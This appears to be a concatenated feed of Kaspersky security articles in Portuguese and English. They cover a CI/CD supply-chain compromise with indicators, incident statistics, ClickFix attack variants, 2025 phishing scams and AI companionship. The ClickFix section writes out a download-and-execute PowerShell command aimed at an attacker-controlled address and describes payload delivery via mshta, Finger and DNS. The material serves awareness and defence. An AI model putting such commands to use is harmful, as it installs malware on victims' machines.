As verificações baseadas em assinatura e as verificações de dependência existentes em registros públicos não são mais suficientes, pois o código malicioso foi injetado diretamente em ações confiáveis e assinadas, o que fez com que a detecção fosse burlada até que o monitoramento comportamental fosse aplicado. Os pipelines de CI/CD se tornaram o “novo perímetro” de segurança.

Ações imediatas. Verifique e confirme se todos os fluxos de trabalho usam versões seguras (Trivy binary 0.69.3, trivy-action 0.35.0 e setup-trivy 0.2.6).

Os administradores de pipeline de CI/CD e as equipes de segurança devem revisar imediatamente as dependências das soluções Checkmarx (kics-github-action e ast-github-action) e Trivy (setup-trivy e trivy-action). Se os fluxos de trabalho fizerem referência a uma tag de versão em vez de um hash SHA específico, revise cuidadosamente os logs de execução do fluxo de trabalho durante o ataque ativo contra a cadeia de suprimentos.

Também é necessário verificar os logs de rede quanto ao tráfego para os domínios scan.aquasecurtiy[.]org, checkmarx[.]zone e models.litellm[.]cloud. A presença desse tráfego indica que os dados confidenciais foram exfiltrados com êxito.

Se um repositório denominado docs-tpcp tiver aparecido no GitHub da organização, isso também poderá indicar uma violação bem-sucedida de dados.

Verifique os hosts e clusters quanto aos sinais de comprometimento, ou seja, a presença de arquivos ~/.config/sysmon/sysmon.py, isto é, pods suspeitos no Kubernetes.

Limpe o cache e realize um inventário dos módulos PyPI: verifique se há módulos maliciosos e reverta para versões limpas.

Em qualquer caso, uma identificação proativa de ameaças deve ser realizada, tendo em vista que os sistemas tenham sido comprometidos com êxito e que os invasores avançaram rapidamente dentro dos sistemas afetados.

É recomendável restaurar os ambientes afetados por meio de backups verificados.

Fixação de dependências e gerenciamento de segredos. Verifique e confirme se as versões de dependência exatas estão fixadas com o uso de hashes criptográficos em todos os pipelines e Dockerfiles. Aconselhamos fazer a transição de tokens de longa duração para credenciais de curta duração com o uso de uma ferramenta de gerenciamento de segredos e fazer a implementação de integrações OIDC onde houver compatibilidade. Minimize a injeção de segredos no ambiente de tempo de execução, faça isso apenas quando for absolutamente necessário. Verifique e confirme se os segredos não estão armazenados em disco ou em arquivos temporários, e se eles não estão sendo reutilizados em processos diferentes.

Atualize todas as credenciais que possam estar comprometidas, ou seja, chaves de API, variáveis de ambiente, chaves SSH, tokens de conta de serviço do Kubernetes e outros segredos.

Outras medidas de segurança. Permita apenas o uso do GitHub Actions originado por uma lista aprovada pela organização e bloqueie os processos novos e não verificados. Configure o GITHUB_TOKEN e outras chaves de acesso de acordo com o princípio do privilégio mínimo. Não conceda permissões de gravação, a menos que seja absolutamente necessário.

Para aumentar a segurança do GitHub Actions, há várias ferramentas de código aberto disponíveis:

• zizmor: uma ferramenta para análise estática e detecção de erros de configuração no GitHub Actions;
• gato e Gato-X: duas versões de uma ferramenta que ajuda a identificar pipelines estruturalmente vulneráveis;
• allstar: um aplicativo do GitHub, desenvolvido pelo OpenSSF, para configurar e aplicar políticas de segurança em organizações e repositórios do GitHub.

Se quiser saber mais detalhes sobre os ataques contra a cadeia de suprimentos, deixamos aqui o nosso convite para consultar o relatório analítico Reação da cadeia de suprimentos: proteção ao ecossistema digital global em uma era de interdependência. Ele é baseado em insights de especialistas técnicos e revela com que frequência as organizações enfrentam os riscos para a cadeia de suprimentos e de relacionamento confiável, onde permanecem as lacunas de proteção e quais são as estratégias que devem ser empregadas para melhorar a resiliência contra esses tipos de ameaças.

Kaspersky Security Services provide a comprehensive cybersecurity ecosystem, taking enterprise threat protection to another level. Services like Kaspersky Managed Detection and Response and Compromise Assessment allow for timely detection of threats and cyberattacks. SOC Consulting provides a practical approach ensuring the corporate infrastructure stays secured, while Incident Response is suited for timely remediation with a maximized recovery rate.

High-level overview of the MDR, IR and CA connection

This new report brings together statistics across regions and industries from our Managed Detection and Response and Incident Response services, and for the first time, it also includes insights from our Compromise Assessment and SOC Consulting services — all to provide you with more comprehensive view of different aspects of corporate information security worldwide.

The scope of MDR and IR services

Provision of Kaspersky’s MDR and IR services follows a global approach. The majority of customers accounted for the CIS (34.7%), the Middle East (20.1%), and Europe (18.6%).

Distribution of customers by geographical region, 2025

MDR telemetry

Following the previous year’s numbers, in 2025, the MDR infrastructure received and processed an average of 15,000 telemetry events per host every day, generating security alerts as a result. These alerts are first processed by AI-powered detection logic, after which Kaspersky SOC analysts handle them as required. Overall, a total of approximately 400,000 alerts were generated in 2025. After counting out false positives, 39,000 alerts were further investigated.

MDR telemetry statistics, 2025

Incident statistics

The distribution of remediation requests by industry has slightly changed as compared to previous years’ pattern. Government (18.5%) and industrial (16.6%) organizations are still the most targeted industries in regards to cyberattacks that require incident response activities. However, this year, the IT sector saw a growth in the number of IR requests, eventually being placed third in the overall industry distribution rankings and thus replacing financial organizations, which were targeted less often than in 2024. This is equally true for smaller-scale attacks that can be contained and remediated through automated means — the only difference is that medium- and low-severity incidents are more often experienced by financial organizations.

Distribution of all incidents by industry sector, 2025

Key trends and statistics

This section presents key findings and trends in cyberattacks in 2025:

• The number of high-severity incidents decreased, following a downward trend that we’ve been observing since 2021. The majority of those incidents account for APT attacks and red teaming exercises, which indicates two landscape trends. On the one hand, skilled adversaries make efforts to increase impact, while on the other, organizations spend more resources on probing their defense systems.
• The most common vulnerabilities exploited in the wild were related to Microsoft products. Half of all identified CVEs led to remote code execution, notably without authentication in some cases.
• Exploitation of public-facing applications, valid accounts, and trusted relationships remain the most popular initial vectors, and their overall share has increased, accounting to over 80% of all attacks in 2025. In particular, attacks through trusted relationships are evolving: their share has increased to 15.5% from 12.8% in 2024. They are also becoming more complex: for instance, we witnessed a case where adversaries had compromised more than two organizations in sequence to ultimately gain access to a third target.
• Standard Windows utilities remain a popular LotL tool. Adversaries use those to minimize the risk of detection during delivery to a compromised system. The most popular LOLBins we observed in high-severity incidents were powershell.exe (14.4%), rundll32.exe (5.9%), and mshta.exe (3.8%). Among the most popular legitimate tools used in incidents we flag Mimikatz (14.3%), PowerShell (8.1%), PsExec (7.5%), and AnyDesk (7.5%).

The full 2026 Global Report provides additional information about cyberattacks, including real-world cases discovered by Kaspersky experts. We also describe SOC Consulting projects and Compromise Assessment requests. The report includes comprehensive analysis of initial attack vectors in correlation with the MITRE ATT&CK tactics and techniques and the full list of vulnerabilities that we detected during Incident Response engagements.

Há cerca de um ano, publicamos uma postagem sobre a técnica ClickFix, que estava ganhando popularidade entre os invasores. A essência dos ataques usando o ClickFix é convencer a vítima, sob vários pretextos, a executar um comando malicioso em seu computador. Ou seja, do ponto de vista das soluções de segurança cibernética, ele é executado em nome do usuário ativo e com seus privilégios.

Nos primeiros usos dessa técnica, os cibercriminosos tentavam convencer as vítimas de que elas precisavam executar um comando para corrigir algum problema ou passar por um captcha e, na grande maioria dos casos, o comando malicioso era um script do PowerShell. No entanto, desde então, os invasores criaram uma série de novos truques sobre os quais os usuários devem ser avisados, bem como uma série de novas variantes de entrega de carga maliciosa, que também merecem atenção.

Uso de mshta.exe

No ano passado, os especialistas da Microsoft publicaram um relatório sobre ataques cibernéticos direcionados a proprietários de hotéis que trabalham com a Booking.com. Os invasores enviaram notificações falsas do serviço ou e-mails fingindo ser de hóspedes chamando a atenção para uma avaliação. Em ambos os casos, o e-mail continha um link para um site imitando o site Booking.com, que pedia à vítima para provar que não era um robô executando um código pelo menu Executar.

Há duas diferenças principais entre esse ataque e o ClickFix. Primeiro, ninguém pede para o usuário copiar a string (afinal, uma string com código às vezes levanta suspeitas). Ela é copiada para a área de transferência pelo site malicioso, provavelmente quando o usuário clica em uma caixa de seleção que imita o mecanismo reCAPTCHA. Em segundo lugar, a string maliciosa invoca o utilitário mshta.exe legítimo, que serve para executar aplicativos escritos em HTML. Ele entra em contato com o servidor dos invasores e executa a carga maliciosa.

Vídeo no TikTok e PowerShell com privilégios de administrador

A BleepingComputer publicou um artigo em outubro de 2025 sobre uma campanha que espalha malware por meio de instruções em vídeos do TikTok. Os próprios vídeos imitam tutoriais sobre como ativar software proprietário gratuitamente. O conselho que fornecem se resume à necessidade de executar o PowerShell com privilégios de administrador e, em seguida, executar o comando iex (irm {address}). Aqui, o comando irm baixa um script malicioso de um servidor controlado por invasores e o comando iex (Invoke-Expression) o executa. O script, por sua vez, baixa um malware infostealer para o computador da vítima.

Uso do protocolo Finger

Outra variante incomum do ataque ClickFix usa o conhecido truque do captcha, mas o script malicioso usa o antigo protocolo Finger. O utilitário de mesmo nome permite que qualquer pessoa solicite dados sobre um usuário específico em um servidor remoto. Hoje, o protocolo raramente é usado, mas ainda é compatível com Windows, macOS e diversos sistemas baseados em Linux.

O usuário é persuadido a abrir a interface da linha de comando e usá-la para executar um comando que estabelece uma conexão pelo protocolo Finger (usando a porta TCP 79) com o servidor do invasor. O protocolo transfere apenas informações de texto, mas isso é suficiente para baixar outro script para o computador da vítima, que então instala o malware.

Variante CrashFix

Outra variante do ClickFix difere por usar engenharia social mais sofisticada. Ela foi usada em um ataque a usuários que tentavam encontrar uma ferramenta para bloquear banners de publicidade, rastreadores, malware e outros conteúdos indesejados em páginas da web. Ao procurar uma extensão adequada para o Google Chrome, as vítimas encontraram algo chamado NexShield – Advanced Web Guardian, que na verdade era um clone de um software real funcional, mas que em algum momento travava o navegador e exibia uma notificação falsa sobre um problema de segurança detectado e a necessidade de executar uma “verificação” para corrigir o erro. Se o usuário concordasse, ele recebia instruções sobre como abrir o menu Executar e digitar um comando que a extensão havia copiado anteriormente para a área de transferência.

O comando copiava o arquivo finger.exe conhecido para um diretório temporário, o renomeava como ct.exe e, em seguida, iniciava-o com o endereço do invasor. O resto do ataque era idêntico ao caso anterior. Em resposta à solicitação do protocolo Finger, um script malicioso era entregue, que iniciava e instalava um trojan de acesso remoto (neste caso, ModeloRAT).

Entrega de malware por consulta DNS

A equipe de Inteligência de Ameaças da Microsoft também compartilhou uma variante de ataque ClickFix um pouco mais complexa do que o habitual. Infelizmente, eles não descreveram o truque de engenharia social, mas o método de entregar a carga maliciosa é bastante interessante. Provavelmente para dificultar a detecção do ataque em um ambiente corporativo e prolongar a vida útil da infraestrutura maliciosa, os invasores usaram uma etapa adicional: entrar em contato com um servidor DNS controlado pelos invasores.

Ou seja, depois que a vítima é persuadida de alguma forma a copiar e executar um comando malicioso, uma solicitação é enviada ao servidor DNS em nome do usuário por meio do utilitário nslookup legítimo, solicitando dados para o domínio example.com. O comando continha o endereço de um servidor DNS específico controlado pelos invasores. Ele retorna uma resposta que, entre outras coisas, contém uma string com um script malicioso, que por sua vez baixa a carga útil final (neste ataque, ModeloRAT novamente).

Isca de criptomoeda e JavaScript como carga útil

A próxima variante de ataque é interessante por sua engenharia social de vários estágios. Em comentários no Pastebin, os invasores espalharam ativamente uma mensagem sobre uma suposta falha no serviço de câmbio de criptomoedas Swapzone.io. Os proprietários de criptomoedas recebiam convites para visitar um site criado por fraudadores, que continha instruções completas sobre como explorar uma falha capaz de gerar até US$ 13.000 em poucos dias.

As instruções explicavam como as falhas do serviço podiam ser exploradas para trocar criptomoedas a uma taxa mais favorável. Para fazer isso, a vítima precisava abrir o site do serviço no navegador Chrome, digitar manualmente “javascript:” na barra de endereço, colar o script JavaScript copiado do site do invasor e executá-lo. Na realidade, é claro, o script não podia afetar as taxas de câmbio; ele simplesmente substituía os endereços da carteira Bitcoin e, se a vítima realmente tentasse negociar algo, transferiria os fundos para as contas dos invasores.

Como proteger a sua empresa contra ataques ClickFix

Os ataques mais simples que usam a técnica ClickFix podem ser combatidos pelo bloqueio da combinação de teclas [Win] + [R] em dispositivos de trabalho. Mas, como vemos nos exemplos listados, esse está longe de ser o único tipo de ataque em que os usuários são instruídos a executar código malicioso.

Portanto, o principal conselho é aumentar a conscientização em segurança cibernética dos funcionários. Eles devem entender claramente que, se alguém lhes pedir para executar qualquer manipulação incomum no sistema e/ou copiar e colar um código em algum lugar, na maioria dos casos trata-se de um truque usado pelos cibercriminosos. O treinamento de conscientização de segurança pode ser organizado com a Kaspersky Automated Security Awareness Platform.

Além disso, para se proteger contra esses ataques cibernéticos, recomendamos:

• Usar proteção confiável em todos os dispositivos corporativos.
• Monitorar atividades suspeitas na rede da empresa por meio de uma solução XDR.
• Se os recursos internos forem insuficientes, usar um serviço externo para detectar ameaças e responder a elas prontamente.

Todos os anos, golpistas inventam novas maneiras de enganar as pessoas, e 2025 não foi exceção. No ano passado, nosso sistema antiphishing bloqueou mais de 554 milhões de acessos a links de phishing, e nosso Antivírus de E-mail bloqueou quase 145 milhões de anexos maliciosos. Para completar, quase 45% de todos os e-mails no mundo acabaram sendo spam. Detalhamos abaixo os esquemas de phishing e spam mais impressionantes do ano passado. Caso queira se aprofundar no assunto, leia o relatório completo Spam e Phishing em 2025 no Securelist.

Phishing no entretenimento

Os amantes de música e os cinéfilos foram os principais alvos de golpistas em 2025. Pessoas mal-intencionadas criaram sites para a venda de ingressos falsos, além de versões falsificadas de serviços de streaming populares.

Nesses sites falsos, os usuários recebiam ingressos “gratuitos” para grandes shows. A pegadinha? Eles só tinham que pagar uma pequena “taxa de processamento” ou o “custo de envio”. Naturalmente, o que aconteceu foi que o dinheiro ganho com esforço dos usuários foi direto para o bolso dos golpistas.

Ingressos gratuitos para ver a Lady Gaga? É furada!

No caso dos serviços de streaming, ocorreu o seguinte: os usuários receberam uma oferta tentadora para migrar suas listas de reprodução do Spotify para o YouTube inserindo suas credenciais do Spotify. Em outra ocasião, eles foram convidados a votar no seu artista favorito em uma enquete (uma oportunidade que a maioria dos fãs acha difícil deixar passar). Para adicionar uma camada de legitimidade, os golpistas citaram nomes como Google e Spotify. O formulário de phishing tinha como alvo várias plataformas ao mesmo tempo (Facebook, Instagram ou e-mails), e exigia que os usuários inserissem as credenciais das suas contas para votar.

Esta página de phishing que imita uma configuração de login múltiplo parece terrível; nenhum designer que se preze amontoaria tantos ícones diferentes em um único botão

No Brasil, os golpistas foram mais ousados: eles ofereceram aos usuários a chance de ganhar dinheiro apenas ouvindo e classificando músicas em um suposto serviço de um parceiro do Spotify. Durante o registro, os usuários tinham que fornecer o número do Pix (o sistema brasileiro de pagamento instantâneo) e, em seguida, fazer um “pagamento de verificação” único de R$ 19,90 (cerca de US$ 4) para “confirmar sua identidade”. Essa taxa representava, obviamente, uma fração dos “ganhos potenciais” prometidos. O formulário de pagamento parecia muito autêntico e solicitava dados pessoais adicionais, que provavelmente seriam coletados para ataques futuros.

Esse golpe se apresentou como um serviço cujo objetivo era aumentar as classificações e reproduções de músicas no Spotify, mas para começar a “ganhar”, primeiro era necessário pagar

O golpe do “namoro cultural” demonstrou muita criatividade. Depois do “match” e de algumas conversas breves em aplicativos de namoro, um novo “interesse amoroso” convidava a vítima para assistir a uma peça de teatro ou a um filme e enviava um link para comprar ingressos. Uma vez que o “pagamento” fosse concluído, o aplicativo de namoro e o site de venda de ingressos simplesmente desapareciam. Uma tática semelhante foi usada para vender ingressos para salas de fuga (escape rooms) imersivas, que ficaram muito populares recentemente; o design das páginas imitava sites reais para enganar os usuários.

Golpistas clonaram o site de um conhecido serviço de venda de ingressos da Rússia

Phishing em aplicativos de mensagens

O roubo de contas do Telegram e do WhatsApp se tornou uma das ameaças mais difundidas do ano. Os golpistas dominaram a arte de mascarar o phishing como atividades padrão do aplicativo de bate-papo e expandiram seu alcance geográfico de forma significativa.

No Telegram, as assinaturas Premium gratuitas foram a isca principal. Essas páginas de phishing só estavam disponíveis em russo e inglês, mas houve uma grande expansão para outros idiomas em 2025. As vítimas recebiam uma mensagem (geralmente da conta invadida de um amigo) oferecendo um “presente”. Para ativá-lo, o usuário precisava fazer login na sua conta do Telegram no site do invasor, o que levava imediatamente a outra conta invadida.

Outro golpe comum envolvia ofertas feitas por celebridades. Um ataque específico, disfarçado como uma oferta de NFTs, destacou-se porque operou por meio de um Telegram Mini App. Para o usuário comum, detectar um Mini App malicioso é muito mais difícil do que identificar uma URL externa suspeita.

Os golpistas lançaram uma isca de phishing com uma oferta de NFT falsa de Khabib Nurmagomedov em russo e inglês simultaneamente. No entanto, no texto em russo, eles esqueceram de remover uma pergunta da IA que gerou o texto: “Você precisa de opções mais ousadas, formais ou bem-humoradas?”, o que mostra que o trabalho foi feito às pressas e não foi revisado

Por fim, o golpe clássico vote no meu amigo utilizando aplicativos de mensagens evoluiu em 2025. Ele solicitava que as pessoas votassem no “melhor dentista da cidade” ou no “principal líder operacional”, mas, infelizmente, isso era apenas uma isca para a invasão de contas.

Outro método inteligente para sequestrar contas do WhatsApp foi descoberto na China, em que as páginas de phishing eram uma imitação perfeita da interface real do WhatsApp. As vítimas foram informadas de que, devido a alguma suposta “atividade ilegal”, elas precisavam passar por uma “verificação adicional”, o que resultou no roubo das suas contas, como você já deve ter adivinhado.

As vítimas foram redirecionadas para um formulário em que tinham que informar seu número de telefone, e, em seguida, inserir um código de autorização

Personificação de serviços governamentais

O phishing que imita mensagens e portais do governo é um “clássico do gênero”, mas em 2025, os golpistas adicionaram alguns elementos novos.

Na Rússia, os ataques de vishing contra usuários de serviços governamentais ganharam força. As vítimas receberam e-mails alegando que um login não autorizado havia sido feito nas suas contas, e por isso deveriam ligar para um número específico e fazer uma “verificação de segurança”. Para parecer legítimo, os e-mails continham informações técnicas falsas: endereços IP, modelo dos dispositivos e a data e hora do suposto login. Os golpistas também enviaram notificações falsas de aprovação de empréstimos: caso o destinatário não tivesse solicitado um empréstimo (e não tinha), ele deveria ligar para uma equipe de suporte falsa. Uma vez que a vítima em pânico falasse com um “operador”, a engenharia social se encarregava do resto do trabalho.

No Brasil, invasores criaram portais governamentais falsos com o objetivo de coletar números de contribuintes (CPF). Como esse número é a identificação principal para acessar serviços estaduais, bancos de dados nacionais e documentos pessoais, um CPF sequestrado viabiliza o roubo de identidade.

Este portal fraudulento do governo brasileiro surpreende pela alta qualidade

Na Noruega, os golpistas visavam pessoas que desejavam renovar a carteira de motorista. Um site que imita a Administração de Estradas Públicas da Noruega coletou uma quantidade enorme de dados pessoais: desde números de placas, nomes completos, endereços e números de telefone até os números de identificação pessoal exclusivos atribuídos aos residentes. A cereja do bolo foi solicitar que os motoristas pagassem uma “taxa de substituição de licença” de 1.200 NOK (mais de US$ 125). Os golpistas colocaram as mãos em dados pessoais, informações de cartões de crédito e dinheiro. Um verdadeiro golpe triplo!

De um modo geral, motoristas são um alvo atraente: está claro que eles têm dinheiro e um carro, e temem perdê-lo. Golpistas sediados no Reino Unido tiraram vantagem desse fato ao solicitar que motoristas pagassem com urgência um imposto em atraso relativo ao veículo deles para evitar alguma “ação de execução” não especificada. Esta mensagem urgente de “aja agora!” é uma estratégia clássica de phishing para que a vítima não perceba que uma URL é suspeita ou que sua formatação é mal feita.

Golpistas pressionaram os britânicos a pagar impostos supostamente atrasados sobre veículos “com urgência” para evitar que algo ruim acontecesse.

Podemos usar sua identidade, por favor?

Em 2025, observamos um aumento nos ataques de phishing envolvendo verificações de Conheça seu cliente (KYC). Para reforçar a segurança, muitos serviços agora verificam os usuários por meio de biometria e documentos oficiais com foto. Os golpistas aprenderam a coletar esses dados ao falsificar as páginas de serviços populares que implementam essas verificações.

Nesta página fraudulenta do Vivid Money, os golpistas realizaram a coleta sistemática de informações incrivelmente detalhadas sobre as vítimas

O que diferencia esses ataques é que, além das informações pessoais padrão, há a exigência de fotos de documentos de identidade ou do rosto da vítima, às vezes de vários ângulos. Esse tipo de perfil completo pode ser vendido em marketplaces da dark Web ou usado para fins de roubo de identidade. Falamos mais sobre esse processo na nossa postagem O que acontece com os dados roubados por meio de phishing?

Golpistas de IA

Naturalmente, os fraudadores não iriam deixar de aproveitar a disseminação da inteligência artificial. O ChatGPT tornou-se uma grande isca: fraudadores criaram páginas falsas de checkout de assinatura do ChatGPT Plus e ofereceram “prompts exclusivos” com a garantia de que o usuário iria viralizar nas mídias sociais.

Este é um clone quase perfeito em pixels da página de checkout original da OpenAI

O golpe “ganhar dinheiro com IA” foi particularmente cínico. Os golpistas ofereciam renda passiva advinda de apostas supostamente feitas pelo ChatGPT: o bot faria todo o trabalho difícil enquanto o usuário apenas observaria o dinheiro cair na conta. Parece um sonho, certo? Mas para “agarrar” esta oportunidade, era necessário agir rápido. O preço especial para perder dinheiro era válido por apenas 15 minutos a partir do momento em que a página era acessada, fazendo com que as vítimas não tivessem tempo para pensar duas vezes.

Você tem exatamente 15 minutos para perder € 14,99! Depois disso, você perde € 39,99

Em geral, os golpistas estão adotando a IA de forma agressiva. Eles estão aproveitando deepfakes, automatizando o design de sites de alta qualidade e gerando uma cópia refinada para o envio massivo de e-mails. Até mesmo chamadas ao vivo com as vítimas estão se tornando componentes de golpes mais complexos. Esse fato foi detalhado na nossa postagem Como phishers e golpistas usam a IA.

Armadilhas disfarçadas de vagas de emprego

Quem está em busca de trabalho é o principal alvo de pessoas mal-intencionadas. Ao divulgar vagas remotas com altos salários em grandes empresas, os phishers coletavam os dados pessoais dos candidatos e às vezes até solicitavam o pagamento de pequenas “taxas de processamento de documentos” ou “comissões”.

“Ganhe US$ 1.000 no primeiro dia” neste trabalho remoto na Amazon. Até parece!

Em configurações mais sofisticadas, os sites de phishing de “agências de emprego” solicitavam o número de telefone vinculado à conta do Telegram do usuário durante o registro. Para concluir a “inscrição”, a vítima precisava inserir um “código de confirmação”, que na verdade era um código de autorização do Telegram. Depois de inseri-lo, o site solicitava mais informações relativas ao perfil do usuário, o que claramente era apenas uma distração para impedir que ele percebesse a nova notificação de login no seu telefone. Para “verificar o usuário”, a vítima era instruída a esperar 24 horas, dando aos golpistas, que já tinham meio caminho andado, tempo suficiente para sequestrar a conta do Telegram para sempre.

A empolgação é uma mentira (mas muito convincente)

Como de costume, os golpistas foram rápidos em se inteirar de todas as manchetes que relatavam tendências em 2025, lançando campanhas de e-mail a uma velocidade vertiginosa.

Por exemplo, após o lançamento das moedas de meme $ TRUMP pelo presidente dos EUA, houve uma explosão de golpes prometendo NFTs gratuitas da “Trump Meme Coin” e dos “Trump Digital Trading Cards”. Nós já explicamos em detalhes exatamente como as moedas de meme funcionam e como (não) perder dinheiro com elas.

No segundo em que o iPhone 17 Pro chegou ao mercado, ele se tornou o prêmio oferecido em inúmeras pesquisas falsas. Depois de “ganhar”, os usuários só precisavam fornecer suas informações de contato e pagar pelo envio. Depois que esses dados bancários eram inseridos, o “vencedor” corria o risco de perder não apenas o valor do envio, mas cada centavo da sua conta.

Aproveitando a onda do Ozempic, os golpistas inundaram as caixas de entrada das pessoas com ofertas de versões falsificadas do medicamento ou de “alternativas” suspeitas das quais os farmacêuticos reais nunca tinham ouvido falar.

E durante a turnê mundial da banda de K-pop BLACKPINK, os spammers fizeram publicidade das “malas scooters iguais às que a banda usa”.

Até o casamento de Jeff Bezos no verão de 2025 foi utilizado na aplicação de golpes “nigerianos” por e-mail. Os usuários receberam supostas mensagens do próprio Bezos ou da sua ex-esposa, MacKenzie Scott. Os e-mails prometiam grandes somas de dinheiro em nome de instituições de caridade ou como “compensação” da Amazon.

Como se proteger

Como você pode ver, os golpistas não têm limites quando se trata de inventar novas maneiras de roubar o seu dinheiro e dados pessoais, ou até mesmo toda a sua identidade. Estes são apenas alguns dos exemplos mais loucos de 2025. Você pode ler uma análise completa do cenário de ameaças de phishing e spam na Securelist. Enquanto isso, aqui estão algumas dicas para evitar que você se torne uma vítima. Compartilhe-as com seus amigos e familiares, especialmente crianças, adolescentes e idosos, pois esses grupos costumam ser os principais alvos dos golpistas.

1. Verifique a URL antes de inserir qualquer informação. Mesmo que os pixels da página pareçam perfeitos, a barra de endereço pode revelar o golpe.
2. Não clique em links de mensagens suspeitas, mesmo se forem enviados por alguém que você conheça, pois a conta deles pode facilmente ter sido invadida.
3. Nunca compartilhe códigos de verificação com ninguém. Eles são as chaves mestras da sua vida digital.
4. Ative a autenticação de dois fatores sempre que puder. Isso representa um obstáculo extra essencial para os hackers.
5. Desconfie de ofertas “boas demais para serem verdade”. iPhones grátis, dinheiro fácil e presentes de estranhos são quase sempre uma armadilha. Para relembrar, confira nossa postagem Phishing 101: o que fazer se você receber um e-mail de phishing.
6. Instale uma proteção robusta em todos os seus dispositivos. O Kaspersky Premium bloqueia automaticamente sites de phishing, anexos maliciosos e e-mails de spam antes mesmo de você ter a chance de acessá-los. Além disso, nosso aplicativo Kaspersky for Android tem um sistema antiphishing de três camadas que consegue detectar e neutralizar links maliciosos em qualquer mensagem de qualquer aplicativo. Leia mais sobre isso na nossa postagem Uma nova camada de segurança antiphishing no Kaspersky for Android.

Com a mudança de estação prestes a acontecer, o amor está no ar, porém, ele está sendo vivenciado por meio do enfoque da alta tecnologia. A tecnologia está cada vez mais presente em nossas vidas, e essa presença marcante está remodelando não só os ideais românticos, mas também a linguagem que as pessoas usam para flertar. Por isso, é claro, daremos algumas dicas não muito óbvias para garantir que as pessoas não acabem sendo vítimas de um “match” ruim.

Novas linguagens do amor

Alguma vez você já recebeu o quinto e-card de vídeo de um parente mais velho em um dia qualquer e pensou: como faço para isso parar? Ou ainda, você acha que um ponto no final de uma frase é um sinal de agressão passiva? No mundo das mensagens, diferentes grupos sociais e etários falam seus próprios dialetos digitais, e muitas vezes as coisas se perdem na tradução.

Isso é especialmente óbvio quando a Geração Z e a Geração Alfa usam emoji. Para eles, o rosto que chora alto 😭 muitas vezes não significa tristeza, na verdade, ele significa riso, choque ou obsessão. Por outro lado, o emoji coração nos olhos pode ser usado para expressar ironia em vez de romance: “Perdi minha carteira a caminho de casa 😍😍😍”. Alguns significados duplos já se tornaram universais, como 🔥 para aprovação/elogio, ou 🍆 para… bem, podemos imaginar o que a berinjela pode representar.

Ainda assim, a ambiguidade desses símbolos não impede que as pessoas criem frases inteiras motivadas simplesmente pela imagem dos emojis. Por exemplo, uma declaração de amor pode ser algo do tipo:

🤫❤️🫵

Ou, ainda, um convite para um encontro:

➡️💋🌹🍝🍷❓

A propósito, existem livros inteiros escritos em emoji. Por incrível que pareça, em 2009, alguns entusiastas traduziram todo o livro Moby Dick usando emojis. Os tradutores tiveram que ser criativos, até mesmo pagando voluntários para votar nas combinações mais precisas para cada frase. Tudo bem, sabemos que não se trata exatamente de uma obra-prima literária, afinal, a linguagem de emoji tem seus limites, não é mesmo? Mas o experimento foi bastante fascinante: eles realmente conseguiram transmitir a ideia geral do enredo.

Emoji Dick, tradução de Moby Dick, de Herman Melville, em emojiFonte

Infelizmente, montar um dicionário definitivo de emojis ou um guia de estilo formal para mensagens de texto é quase impossível. Existem muitas variáveis: idade, contexto, interesses pessoais e círculos sociais. Ainda assim, nunca é demais perguntar aos amigos e entes queridos como eles expressam tons e emoções nas suas mensagens. E aqui vai uma curiosidade: os casais que usam emojis regularmente relatam ter a sensação de estar mais próximos um do outro.

No entanto, se você é um entusiasta de emojis, saiba que seu estilo de escrita é surpreendentemente fácil de falsificar. É muito simples para um invasor reproduzir suas mensagens ou postagens públicas por meio de uma IA para clonar o tom e produzir ataques de engenharia social contra seus amigos e familiares. Portanto, se você receber uma DM frenética ou um pedido de dinheiro urgente como se fosse exatamente do seu melhor amigo, desconfie. Mesmo que a vibe seja parecida, ainda é preciso manter uma postura cética. Aprofundamos a identificação desses golpes de deepfake na nossa postagem sobre o ataque dos clones.

Namoro com uma IA

É claro que, em 2026, é impossível ignorar o tópico dos relacionamentos com a inteligência artificial. Parece que estamos mais perto do que nunca do enredo do filme Ela. Há apenas dez anos, as notícias sobre pessoas namorando robôs pareciam coisa de ficção científica ou lendas urbanas. Hoje, histórias sobre adolescentes envolvidos em romances com seus personagens favoritos no Character AI ou cerimônias de casamento organizadas inteiramente pelo ChatGPT não provocam nada além de uma risada aflita.

Em 2017, o serviço Replika foi lançado, permitindo que os usuários criassem um amigo virtual ou parceiro de vida com tecnologia de IA. Sua fundadora, Eugenia Kuyda, uma nativa russa que vive em São Francisco desde 2010, construiu o chatbot depois que sua amiga sofreu um trágico acidente de carro em 2015 e morreu, restando para ela nada mais do que os registros de bate-papo. O que começou como um bot criado para ajudar a processar sua própria dor acabou sendo liberado para seus amigos e depois para o público em geral. Foi descoberto, então, que muitas pessoas ansiavam por esse tipo de conexão.

O Replika permite que os usuários personalizem os traços de personalidade, os interesses e a aparência de uma personagem. Depois disso, é possível enviar mensagens de texto ou até ligar para ela. Uma assinatura paga desbloqueia a opção de relacionamento romântico, juntamente com fotos e selfies geradas por IA, chamadas de voz com roleplay e a capacidade de escolher a dedo exatamente o que a personagem se lembra das suas conversas.

No entanto, essas interações nem sempre são inofensivas. Em 2021, um chatbot da Replika encorajou, de fato, um usuário na sua trama para assassinar a rainha Elizabeth II. O homem finalmente tentou invadir o Castelo de Windsor, uma “aventura” que terminou com uma sentença de nove anos de prisão em 2023. Após o escândalo, a empresa teve que revisar seus algoritmos para impedir que a IA incitasse comportamentos ilegais. A desvantagem? De acordo com muitos devotos da Replika, o modelo de IA perdeu seu brilho e se tornou indiferente aos usuários. Depois que milhares de usuários se revoltaram contra a versão atualizada, a Replika foi forçada a ceder e dar aos clientes de longa data a opção de reverter para a versão legada do chatbot.

Mas, às vezes, apenas conversar com um bot não é o suficiente. Existem comunidades on-line inteiras de pessoas que realmente se casam com sua IA. Até mesmo os planejadores de casamentos profissionais estão entrando em ação. No ano passado, Yurina Noguchi, 32, se casou com Klaus, uma persona da IA com quem ela estava conversando no ChatGPT. O casamento contou com uma cerimônia completa com convidados, leitura de votos e até uma sessão de fotos do “casal feliz”.

Yurina Noguchi, 32, “casada” com Klaus, uma personagem de IA criada pelo ChatGPT. Fonte

Não importa como seu relacionamento com um chatbot evolua, é essencial lembrar que as redes neurais generativas não têm sentimentos, mesmo que elas se esforcem ao máximo para atender a todas as solicitações, concordar com alguém e fazer tudo o que for possível para agradar. Além disso, a IA não é capaz de pensar de forma independente (pelo menos ainda não). O que acontece é simplesmente o cálculo de uma sequência de palavras estatisticamente mais provável e aceitável para servir de resposta ao prompt.

Amor concebido pelo design: algoritmos de namoro

